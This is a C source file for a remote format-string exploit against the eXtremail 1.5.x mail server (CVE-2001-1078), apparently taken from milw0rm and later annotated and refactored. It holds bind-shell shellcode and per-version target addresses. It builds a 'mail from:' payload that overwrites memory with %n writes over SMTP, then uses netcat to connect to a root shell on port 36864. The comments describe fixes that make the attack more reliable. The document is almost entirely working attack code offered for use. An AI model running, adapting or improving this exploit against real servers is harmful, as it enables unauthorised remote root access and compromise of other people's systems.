
eXtremail 1.5.x (Linux) - Remote Format Strings - CVE-2001-1078

  1. /****************************************************************/
  2. /*      Linux eXtremail 1.5.x Remote Format Strings Exploit                 */
  3. /*                                                                                                  */
  4. /*                          */
  5. /*                                 By B-r00t - 02/07/2003           */
  6. /*                          */
  7. /*  Versions:       Linux eXtremail-1.5-8 => VULNERABLE     */
  8. /*          Linux eXtremail-1.5-5 => VULNERABLE     */
  9. /*  Exploit uses format strings bug in fLog() of smtpd to bind a    */
  10. /*  r00tshell to port 36864 on the target eXtremail server.     */
  11. /*                          */
  12. /****************************************************************/
  13.  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
  22.  
#define EXPLOIT "eXtreme"   /* program name printed in the banner and usage text */
#define DEST_PORT 25        /* SMTP port the payload is delivered to */

// Prototypes
int get_sock (char *host);      /* connect to host:DEST_PORT, stores the fd in socketfd; exits on failure */
int send_sock (char *stuff);    /* send the NUL-terminated string on socketfd, echo it; exits on error */
int read_sock (void);           /* recv one chunk from socketfd and print it; exits on error */
void usage (void);              /* print help and the target table, then exit(-1) */
int do_it (void);               /* build and send the format-string payload, then exit(0) */
  32.  
// Globals

/* Connected TCP socket to the target's SMTP port; filled in by get_sock(). */
int socketfd;
/* Index into targets[] selected on the command line (main()). */
int choice;
/* Write address and the value written there for the chosen target (do_it()). */
unsigned long GOT;
unsigned long RET;
/* Not referenced anywhere in this file; kept so the interface is unchanged. */
char *myip;

/* SMTP greeting sent once before the payload line. */
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";

/*
 * x86 Linux payload appended to the payload line: a 60-byte NOP sled
 * followed by 124 bytes of code that ends in the string "/bin/sh".
 * Per the file header it binds a shell to port 36864; the sequence
 * \xb0\x90\x66\x89\x46\x16 looks like that port (0x9000) being stored
 * in network order, but that reading has not been verified here.
 * No byte is 0x00, so strlen()-based sends carry the whole thing.
 */
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
  61.  
  62.  
/*
 * Per-target tuning table, indexed by the TARGET command-line argument.
 *   systemtype - label shown by usage() and in the do_it() summary
 *   got        - address the four %n writes land on (GOT, GOT+1, +2, +3);
 *                for release 7 the value is in the 0xbfff.... range, i.e.
 *                it looks like a stack slot rather than a GOT entry
 *   ret        - value written there: where the shellcode is expected to sit
 *   pad        - bytes of 'a' padding used for alignment
 *   buf        - payload size limit reported by do_it() ("max bytes")
 *   pos        - direct-parameter index (%<pos>$n) of the first address
 * The list ends with an all-zero entry.
 */
struct {
        char *systemtype;
        unsigned long got;
        unsigned long ret;
        int pad;
        int buf;
        int pos;
} targets[] = {
    /* Confirmed targets tested by B-r00t. */
    { .systemtype = "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)",
      .got = 0x0813b19c, .ret = 0xbefff1e8, .pad = 1, .buf = 266, .pos = 44 },
    { .systemtype = "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)",
      .got = 0x0813b19c, .ret = 0xbefff1b8, .pad = 1, .buf = 266, .pos = 44 },
    { .systemtype = "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",
      .got = 0xbefff0c8, .ret = 0xbefff1d4, .pad = 1, .buf = 266, .pos = 44 },
    /* Recognisable junk addresses ("ABCD" / 0xaaaaaaaa) for debugging the layout. */
    { .systemtype = "eXtremail V1.5 DEBUG",
      .got = 0x44434241, .ret = 0xaaaaaaaa, .pad = 1, .buf = 266, .pos = 44 },
    { .systemtype = NULL }
};
  82.  
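/*
 * Entry point: "<ip> <target-index>". Opens the SMTP session, exchanges the
 * greeting, then hands off to do_it(), which builds and sends the payload.
 *
 * Changes from the original: the target index is checked against the real
 * size of targets[] instead of a hard-coded "> 3" (adding a table entry
 * silently made it unreachable), it is parsed with strtol() so trailing junk
 * is rejected, the setenv() result is checked, and main returns a value.
 *
 * argv[1] is stored in $TARGET for the netcat step in do_it(); it is only
 * ever validated as a numeric address by get_sock(), which runs before
 * anything reads it back.
 */
int main(int argc, char *argv[])
{
    const char *TARGET = "TARGET";
    long ntargets = 0;
    long idx;
    char *end = NULL;

    printf("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);

    if (argc < 3)
        usage();

    /* Size the valid range from the table's terminating entry. */
    while (targets[ntargets].systemtype != NULL)
        ntargets++;

    idx = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || idx < 0 || idx >= ntargets)
        usage();
    choice = (int)idx;

    if (setenv(TARGET, argv[1], 1) != 0) {
        perror("setenv");
        exit(-1);
    }

    get_sock(argv[1]);
    sleep(1);
    read_sock();
    sleep(1);
    send_sock(helo);
    sleep(1);
    read_sock();
    sleep(1);
    do_it();
    return 0;
}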
  109.  
  110.  
/*
 * Print the usage line, an example, and the numbered target table, then
 * exit(-1). Never returns.
 */
void usage(void)
{
    int i = 0;

    printf("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
    printf("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
    while (targets[i].systemtype != NULL) {
        printf("\n%d\t%s", i, targets[i].systemtype);
        i++;
    }
    printf("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
    exit(-1);
}
  122.  
  123.  
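/*
 * Connect to host:DEST_PORT over TCP and store the descriptor in the global
 * socketfd. Only numeric addresses accepted by inet_aton() are supported;
 * there is no name resolution.
 *
 * Exits on failure: -1 socket(), -2 bad address, -3 connect().
 * Returns socketfd (the original was declared int but returned nothing).
 * Other fixes: the whole sockaddr_in is zeroed rather than only sin_zero;
 * perror() is no longer used for inet_aton(), which does not set errno;
 * the perror() strings no longer embed a newline (perror adds its own).
 */
int get_sock(char *host)
{
    struct sockaddr_in dest_addr;

    socketfd = socket(AF_INET, SOCK_STREAM, 0);
    if (socketfd == -1) {
        perror("Socket Error!");
        exit(-1);
    }

    memset(&dest_addr, 0, sizeof dest_addr);
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(DEST_PORT);
    if (!inet_aton(host, &dest_addr.sin_addr)) {
        fprintf(stderr, "inet_aton problems: '%s' is not a numeric address\n", host);
        close(socketfd);
        exit(-2);
    }

    if (connect(socketfd, (struct sockaddr *)&dest_addr, sizeof dest_addr) == -1) {
        perror("Connect failed!");
        close(socketfd);
        exit(-3);
    }
    printf("\n\nConnected to %s\n", host);
    return socketfd;
}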
  149.  
  150.  
  151.  
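/*
 * Send the NUL-terminated string `stuff` on the global socketfd and echo it
 * to stdout. Returns the number of bytes sent (strlen(stuff)).
 *
 * Fix: send() on a stream socket may accept fewer bytes than asked for; the
 * original made a single call and took whatever it returned. This loops
 * until everything is out. On error it prints the reason, closes the socket
 * and exits(4) as before.
 */
int send_sock(char *stuff)
{
    size_t total = strlen(stuff);
    size_t done = 0;

    while (done < total) {
        ssize_t n = send(socketfd, stuff + done, total - done, 0);
        if (n == -1) {
            perror("Send error");
            close(socketfd);
            exit(4);
        }
        done += (size_t)n;
    }
    printf("Send:\t%s", stuff);
    return (int)done;
}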
  164.  
  165.  
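/*
 * Receive one chunk (at most 199 bytes) of the server's next reply on the
 * global socketfd, print it, and return the byte count (0 if the peer
 * closed). The reply is untrusted data and is only ever passed to printf
 * as a %s argument, never as the format.
 *
 * Fixes: the original recv'd a full sizeof(buffer) bytes into a 200-byte
 * buffer, so a 200-byte reply left no terminator for the following "%s"
 * (stack over-read); the error message said "send" for a recv failure.
 */
int read_sock(void)
{
    char buffer[200];
    ssize_t bytes;

    bytes = recv(socketfd, buffer, sizeof(buffer) - 1, 0);
    if (bytes == -1) {
        perror("recv error");
        close(socketfd);
        exit(4);
    }
    buffer[bytes] = '\0';
    printf("Recv:\t%s", buffer);
    return (int)bytes;
}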
  182.  
  183.  
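/* Serialise the low 32 bits of v as four little-endian bytes (x86 target). */
static void put_le32(unsigned long v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * Build the "mail from:" line that reaches fLog() as a format string:
 *   "mail from: " + PAD x 'a' + GOT,GOT+1,GOT+2,GOT+3 (LE) +
 *   four "%.<w>u%<pos>$n" pairs writing RET one byte at a time + shellcode.
 * Uses the globals choice, GOT and RET. Writes at most `cap` bytes into buf
 * (NUL-terminated) and returns the payload length, or -1 if it would not fit.
 *
 * Fixes vs. the original: r[], g[] and w[] were declared [3] but indexed
 * 0..3 (local stack overflow); GOT+1..+3 are computed on the whole value so
 * a 0xff low byte carries instead of wrapping; lengths are tracked
 * explicitly instead of relying on strncat() with sizeof(src) bounds.
 */
static int build_payload(char *buf, size_t cap)
{
    static const char prefix[] = "mail from: ";
    const int pad = targets[choice].pad;
    const int pos = targets[choice].pos;
    unsigned char r[4], addr[4], w[4];
    char fmt[200];
    size_t len, flen;
    int sofar, i;

    if (pad < 0 || cap < sizeof(prefix) - 1 + (size_t)pad + 16)
        return -1;
    memset(buf, 0, cap);

    memcpy(buf, prefix, sizeof(prefix) - 1);
    len = sizeof(prefix) - 1;
    /* sofar is the number of characters already emitted when the first %n
       fires. The original starts it at 19, not strlen(prefix) == 11 —
       presumably text the daemon prepends to the logged line accounts for
       the difference. It is a tuned value; kept as-is. */
    sofar = 19;

    memset(buf + len, 'a', (size_t)pad);
    len += (size_t)pad;
    sofar += pad;

    /* Any 0x00 byte in these addresses ends the line on the wire; the
       original (strncat) had the same constraint, do_it() now warns. */
    for (i = 0; i < 4; i++) {
        put_le32(GOT + (unsigned long)i, addr);
        memcpy(buf + len, addr, 4);
        len += 4;
    }
    sofar += 16;

    /* Each %.Nu must raise the running count to the next byte of RET,
       modulo 256. One expression covers the original's three cases
       (r > sofar, r == sofar, r < sofar), including its wrap-around. */
    put_le32(RET, r);
    for (i = 0; i < 4; i++) {
        w[i] = (unsigned char)((unsigned)(r[i] - sofar) & 0xffu);
        sofar += w[i];
    }
    /* NOTE(review): "%.Nu" guarantees a minimum of N digits, not exactly N;
       if the popped value has more digits (or N is 0 and it is non-zero) the
       count overshoots. The original exploit carries the same assumption. */
    flen = (size_t)snprintf(fmt, sizeof fmt,
                            "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
                            w[0], pos, w[1], pos + 1, w[2], pos + 2, w[3], pos + 3);
    if (flen >= sizeof fmt || len + flen + sizeof(shellcode) > cap)
        return -1;
    memcpy(buf + len, fmt, flen);
    len += flen;

    memcpy(buf + len, shellcode, sizeof(shellcode) - 1);
    len += sizeof(shellcode) - 1;
    return (int)len;
}

/*
 * Connect to the shell the payload should have bound on port 36864 by
 * exec'ing nc with an explicit argv. The original ran
 * system("nc -vv ${TARGET} 36864 || echo ...") with $TARGET taken from
 * argv[1] by main(); get_sock() had already forced it through inet_aton(),
 * so no shell metacharacters could get that far, but exec with a fixed argv
 * no longer depends on that ordering. Prints the original failure message
 * if nc cannot be run or exits non-zero.
 */
static void spawn_shell(void)
{
    const char *target = getenv("TARGET");
    pid_t pid;
    int status;

    if (target == NULL) {
        fprintf(stderr, "TARGET is not set; cannot connect to the shell\n");
        return;
    }
    pid = fork();
    if (pid == -1) {
        perror("fork");
        return;
    }
    if (pid == 0) {
        execlp("nc", "nc", "-vv", target, "36864", (char *)NULL);
        perror("execlp nc");
        _exit(127);
    }
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status) ||
        WEXITSTATUS(status) != 0)
        printf("Sorry Exploit failed!\n");
}

/*
 * Build the payload for targets[choice], print a summary, send it on the
 * already-greeted SMTP session, close the socket and try to reach the bound
 * shell. Sets the globals GOT and RET from the table; never returns.
 *
 * Extra checks: the payload length is compared with the target's "max bytes"
 * and a NUL byte in the payload is reported, since send_sock() stops at it.
 * Format specifiers now match the argument types (%lx for unsigned long).
 */
int do_it(void)
{
    char buf[500];
    int len;

    GOT = targets[choice].got;
    RET = targets[choice].ret;

    len = build_payload(buf, sizeof buf);
    if (len < 0) {
        fprintf(stderr, "\nPayload does not fit in the local buffer\n");
        close(socketfd);
        exit(5);
    }

    printf("\nSystem type:\t\t%s", targets[choice].systemtype);
    printf("\nWrite Addy:\t\t0x%lx", GOT);
    printf("\nRET (shellcode):\t0x%lx", RET);
    printf("\nPAD (alignment):\t%d", targets[choice].pad);
    printf("\nPayload:\t\t%d / %d max bytes", len, targets[choice].buf);
    if (len > targets[choice].buf)
        printf("\nWARNING: payload exceeds the target's %d byte limit; expect failure",
               targets[choice].buf);
    if (memchr(buf, '\0', (size_t)len) != NULL)
        printf("\nWARNING: payload contains a NUL byte and will be truncated on send");
    printf("\nSending it ... \n");
    sleep(1);

    send_sock(buf);
    sleep(1);
    close(socketfd);
    printf("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
    sleep(3); /* the daemon may take a moment to bind the shell */
    spawn_shell();
    exit(0);
}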
  275.  
  276. // milw0rm.com [2003-07-02]